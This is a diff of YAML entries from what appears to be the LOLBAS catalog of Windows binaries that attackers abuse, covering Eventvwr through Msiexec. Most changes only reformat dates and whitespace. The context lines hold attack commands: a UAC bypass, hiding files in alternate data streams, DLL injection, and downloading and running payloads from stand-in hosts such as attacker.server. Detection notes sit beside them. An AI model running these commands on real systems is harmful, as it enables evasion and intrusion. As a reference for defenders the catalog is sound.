@ -2,11 +2,11 @@
|
||||
Name: Eventvwr.exe
|
||||
Description: Displays Windows Event Logs in a GUI window.
|
||||
Author: 'Jacob Gajek'
|
||||
Created: '2018-11-01'
|
||||
Created: 2018-11-01
|
||||
Commands:
|
||||
- Command: eventvwr.exe
|
||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Category: UAC bypass
|
||||
Privileges: User
|
||||
MitreID: T1088
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Expand.exe
|
||||
Description: Binary that expands one or more compressed files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||
Description: Copies source file to destination.
|
||||
@ -31,10 +31,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Expand.exe
|
||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
||||
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||
@ -43,4 +43,4 @@ Acknowledgement:
|
||||
Handle: '@infosecn1nja'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Explorer.exe
|
||||
Description: Binary used for managing files and system components within Windows
|
||||
Author: 'Jai Minton'
|
||||
Created: '2020-06-24'
|
||||
Created: 2020-06-24
|
||||
Commands:
|
||||
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\explorer.exe
|
||||
- Path: C:\Windows\SysWOW64\explorer.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Extexport.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Extexport.exe c:\test foo bar
|
||||
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
---
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
Name: Extrac32.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
@ -39,10 +39,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\extrac32.exe
|
||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Findstr.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\findstr.exe
|
||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: finstr.exe should normally not be invoked on a client system
|
||||
@ -49,4 +49,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Forfiles.exe
|
||||
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
||||
@ -23,10 +23,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\forfiles.exe
|
||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
@ -36,4 +36,4 @@ Acknowledgement:
|
||||
Handle: '@vector_sec'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ftp.exe
|
||||
Description: A binary designed for connecting to FTP servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-12-10'
|
||||
Created: 2018-12-10
|
||||
Commands:
|
||||
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
||||
Description: Executes the commands you put inside the text file.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\ftp.exe
|
||||
- Path: C:\Windows\SysWOW64\ftp.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: cmd /c as child process of ftp.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: GfxDownloadWrapper.exe
|
||||
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
||||
Author: Jesus Galvez
|
||||
Created: Jesus Galvez
|
||||
Created: 2019-12-27
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||||
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
||||
@ -169,7 +169,7 @@ Full_Path:
|
||||
- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
|
||||
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
||||
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
||||
Resources:
|
||||
- Link: https://www.sothis.tech/author/jgalvez/
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Gpscript.exe
|
||||
Description: Used by group policy to process scripts
|
||||
Description: Used by group policy to process scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Gpscript /logon
|
||||
Description: Executes logon scripts configured in Group Policy.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\gpscript.exe
|
||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scripts added in local group policy
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Hh.exe
|
||||
Description: Binary used for processing chm files in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: HH.exe http://some.url/script.ps1
|
||||
Description: Open the target PowerShell script with HTML Help.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\hh.exe
|
||||
- Path: C:\Windows\SysWOW64\hh.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
||||
@ -32,4 +32,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Ie4uinit.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ie4uinit.exe -BaseSettings
|
||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||
@ -17,7 +17,7 @@ Full_Path:
|
||||
- Path: c:\windows\sysWOW64\ie4uinit.exe
|
||||
- Path: c:\windows\system32\ieuinit.inf
|
||||
- Path: c:\windows\sysWOW64\ieuinit.inf
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: ie4uinit.exe loading a inf file from outside %windir%
|
||||
@ -26,4 +26,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Ieexec.exe
|
||||
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Download
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Execute
|
||||
@ -23,13 +23,13 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ilasm.exe
|
||||
Description: used for compile c# code into dll or exe.
|
||||
Author: Hai vaknin (lux)
|
||||
Created: 17/03/2020
|
||||
Created: 2020-03-17
|
||||
Commands:
|
||||
- Command: ilasm.exe C:\public\test.txt /exe
|
||||
Description: Binary file used by .NET to compile c# code to .exe
|
||||
@ -11,7 +11,7 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||
OperatingSystem: Windows 10,7
|
||||
OperatingSystem: Windows 10,7
|
||||
- Command: ilasm.exe C:\public\test.txt /dll
|
||||
Description: Binary file used by .NET to compile c# code to dll
|
||||
Usecase: A description of the usecase
|
||||
@ -22,7 +22,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Resources:
|
||||
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Infdefaultinstall.exe
|
||||
Description: Binary used to perform installation based on content inside inf files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
||||
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Kyle Hanslovan
|
||||
Handle: '@kylehanslovan'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Installutil.exe
|
||||
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
@ -25,7 +25,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -39,4 +39,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Jsc.exe
|
||||
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2019-05-31'
|
||||
Created: 2019-05-31
|
||||
Commands:
|
||||
- Command: jsc.exe scriptfile.js
|
||||
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
||||
@ -25,14 +25,14 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
||||
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
||||
Resources:
|
||||
- Link: https://twitter.com/DissectMalware/status/998797808907046913
|
||||
- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
|
||||
Acknowledgement:
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Makecab.exe
|
||||
Description: Binary to package existing files into a cabinet (.cab) file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
@ -31,7 +31,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\makecab.exe
|
||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Makecab getting files from Internet
|
||||
@ -41,4 +41,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mavinject.exe
|
||||
Description: Used by App-v in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||
Description: Inject evil.dll into a process with PID 3110.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mavinject.exe
|
||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||
@ -36,4 +36,4 @@ Acknowledgement:
|
||||
Handle: '@gN3mes1s'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Microsoft.Workflow.Compiler.exe
|
||||
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
||||
Author: 'Conor Richard'
|
||||
Created: '2018-10-22'
|
||||
Created: 2018-10-22
|
||||
Commands:
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||
@ -19,7 +19,7 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows 10S
|
||||
OperatingSystem: Windows 10S
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||
Usecase: Compile and run code
|
||||
@ -27,10 +27,10 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows 10S
|
||||
OperatingSystem: Windows 10S
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||
@ -53,4 +53,4 @@ Acknowledgement:
|
||||
Handle: '@FortyNorthSec'
|
||||
- Person: Bank Security
|
||||
Handle: '@Bank_Security'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mmc.exe
|
||||
Description: Load snap-ins to locally and remotely manage Windows systems
|
||||
Author: '@bohops'
|
||||
Created: '2018-12-04'
|
||||
Created: 2018-12-04
|
||||
Commands:
|
||||
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
||||
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
||||
@ -15,10 +15,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mmc.exe
|
||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||
Acknowledgement:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: MpCmdRun.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '09/03/2020'
|
||||
Created: 2020-03-20
|
||||
Commands:
|
||||
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
||||
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
||||
@ -32,9 +32,9 @@ Full_Path:
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: MpCmdRun storing data into alternate data streams.
|
||||
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
||||
@ -54,4 +54,4 @@ Acknowledgement:
|
||||
Handle: ''
|
||||
- Person: Cedric
|
||||
Handle: '@th3c3dr1c'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Msbuild.exe
|
||||
Name: Msbuild.exe
|
||||
Description: Used to compile and execute code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msbuild.exe pshell.xml
|
||||
Description: Build and execute a C# project stored in the target XML file.
|
||||
@ -27,7 +27,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||
@ -41,4 +41,4 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Cn33liz
|
||||
Handle: '@Cneelis'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msconfig.exe
|
||||
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Msconfig.exe -5
|
||||
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msconfig.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||
Detection:
|
||||
- IOC: mscfgtlc.xml changes in system32 folder
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Msdt.exe
|
||||
Description: Microsoft diagnostics tool
|
||||
Description: Microsoft diagnostics tool
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
@ -23,15 +23,15 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Msdt.exe
|
||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- Link: https://twitter.com/harr0ey/status/991338229952598016
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mshta.exe
|
||||
Description: Used by Windows to execute html applications. (.hta)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: mshta.exe evilfile.hta
|
||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mshta.exe
|
||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||
Detection:
|
||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||
@ -48,10 +48,10 @@ Resources:
|
||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msiexec.exe
|
||||
Description: Used by Windows to execute msi files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msiexec /quiet /i cmd.msi
|
||||
Description: Installs the target .MSI file silently.
|
||||
@ -35,11 +35,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
